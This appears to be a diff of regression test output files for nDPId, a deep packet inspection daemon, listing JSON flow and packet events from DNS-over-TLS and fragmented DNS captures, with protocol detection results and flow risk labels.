{"version":"TLSv1.2","client_requested_server_name":"","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"2b341b88c742e940cfb485ce7d93dde7","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"BE:73:46:2A:2E:FB:A9:E9:42:D0:71:10:1B:8C:BF:44:6A:5D:AD:53"}}
01056{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1572783663234,"flow_last_seen":1572783666246,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":4269,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1572783666246,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":24,"source":"dns_dot.pcap","alias":"nDPId-test","packets-captured":24,"packets-processed":24,"total-skipped-flows":0,"total-l4-data-len":4269,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1572783666246}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 24/24

28
test/results/dns_fragmented.pcap.out
View File

@@ -118,25 +118,25 @@
00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913732,"flow_last_seen":1560869913732,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869913732,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1560869913751,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":134,"pkt_l4_len":80,"thread_ts_msec":1560869913751,"pkt":"AAwpfKTLCFsOoYNeht1gDizvAFARPCYGRwBHAAAAAAAAAAAAEREgAQRwHwsWsAIMKf\/+fKTLADXshgBQyy0\/f4GAAAEAAQAAAAEDbnMyCHdlYmVyZG5zAmRlAAAcAAHADAAcAAEAAA4QABAgAQRwHwsWsAAAAAAKJgBTAAApBawAAAAAAAA="}
00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869913732,"flow_last_seen":1560869913751,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1560869913751,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}}
00621{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1560869913753,"pkt":"AAwpYjEqAAwpfKTLht1gD07UACgGQCABBHAfCxawAgwp\/\/58pMsgAQRwHwsWsAAAAAAKJgBT3wEANSHNFggAAAAAoAJfUI5TAAACBATEBAIICoRF3zoAAAAAAQMDBw=="}
00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1560869913753,"pkt":"AAwpfKTLAAwpYjEqht1gBqwSACgGQCABBHAfCxawAAAAAAomAFMgAQRwHwsWsAIMKf\/+fKTLADXfAVwH8KghzRYJoBJeYK7OAAACBATEBAIIChJ809KERd86AQMDBw=="}
00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1560869913753,"pkt":"AAwpYjEqAAwpfKTLht1gD07UACAGQCABBHAfCxawAgwp\/\/58pMsgAQRwHwsWsAAAAAAKJgBT3wEANSHNFglcB\/CpgBAAv45LAAABAQgKhEXfOxJ809I="}
00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":50,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869913753,"flow_last_seen":1560869913754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869913754,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
00621{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1560869913753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1560869913753,"pkt":"AAwpYjEqAAwpfKTLht1gD07UACgGQCABBHAfCxawAgwp\/\/58pMsgAQRwHwsWsAAAAAAKJgBT3wEANSHNFggAAAAAoAJfUI5TAAACBATEBAIICoRF3zoAAAAAAQMDBw=="}
00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1560869913753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1560869913753,"pkt":"AAwpfKTLAAwpYjEqht1gBqwSACgGQCABBHAfCxawAAAAAAomAFMgAQRwHwsWsAIMKf\/+fKTLADXfAVwH8KghzRYJoBJeYK7OAAACBATEBAIIChJ809KERd86AQMDBw=="}
00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1560869913753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1560869913753,"pkt":"AAwpYjEqAAwpfKTLht1gD07UACAGQCABBHAfCxawAgwp\/\/58pMsgAQRwHwsWsAAAAAAKJgBT3wEANSHNFglcB\/CpgBAAv45LAAABAQgKhEXfOxJ809I="}
00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":50,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869913753,"flow_last_seen":1560869913754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869913754,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916459,"flow_last_seen":1560869916459,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869916459,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1560869916459,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":106,"pkt_l4_len":52,"thread_ts_msec":1560869916459,"pkt":"CFsOoYNeAAwpfKTLht1gAxE1ADQRQCABBHAfCxawAgwp\/\/58pMsmBkcARwAAAAAAAAAAABER1T4ANQA07tzo3wEAAAEAAAAAAAEDbnMyCHdlYmVyZG5zAmRlAAABAAEAACkCAAAAAAAAAA=="}
00807{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916459,"flow_last_seen":1560869916459,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869916459,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1560869916473,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":122,"pkt_l4_len":68,"thread_ts_msec":1560869916473,"pkt":"AAwpfKTLCFsOoYNeht1gCEAKAEQRPCYGRwBHAAAAAAAAAAAAEREgAQRwHwsWsAIMKf\/+fKTLADXVPgBEGsro34GAAAEAAQAAAAEDbnMyCHdlYmVyZG5zAmRlAAABAAHADAABAAEAAA4QAATC9wUOAAApBawAAAAAAAA="}
00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869916459,"flow_last_seen":1560869916473,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869916473,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.5.14"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916474,"flow_last_seen":1560869916474,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1560869916474,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1560869916474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1560869916474,"pkt":"AAwpYjEqAAwpfKTLCABFAAA8zqNAAEAG3BXC9wUGwvcFDphdADXWgnc5AAAAAKACchCQMQAAAgQFtAQCCAox8fNRAAAAAAEDAwc="}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1560869916475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1560869916475,"pkt":"AAwpfKTLAAwpYjEqCABFAAA8AABAAEAGqrnC9wUOwvcFBgA1mF3frqtz1oJ3OqAScSDR+QAAAgQFtAQCCAqVd0imMfHzUQEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1560869916475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1560869916475,"pkt":"AAwpYjEqAAwpfKTLCABFAAA0zqRAAEAG3BzC9wUGwvcFDphdADXWgnc6366rdIAQAOWQKQAAAQEICjHx81GVd0im"}
00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916474,"flow_last_seen":1560869916474,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1560869916474,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1560869916474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1560869916474,"pkt":"AAwpYjEqAAwpfKTLCABFAAA8zqNAAEAG3BXC9wUGwvcFDphdADXWgnc5AAAAAKACchCQMQAAAgQFtAQCCAox8fNRAAAAAAEDAwc="}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1560869916475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1560869916475,"pkt":"AAwpfKTLAAwpYjEqCABFAAA8AABAAEAGqrnC9wUOwvcFBgA1mF3frqtz1oJ3OqAScSDR+QAAAgQFtAQCCAqVd0imMfHzUQEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1560869916475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1560869916475,"pkt":"AAwpYjEqAAwpfKTLCABFAAA0zqRAAEAG3BzC9wUGwvcFDphdADXWgnc6366rdIAQAOWQKQAAAQEICjHx81GVd0im"}
00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869913732,"flow_last_seen":1560869913751,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869916474,"flow_last_seen":1560869916477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869916474,"flow_last_seen":1560869916477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1560869900222,"flow_last_seen":1560869905232,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1528,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
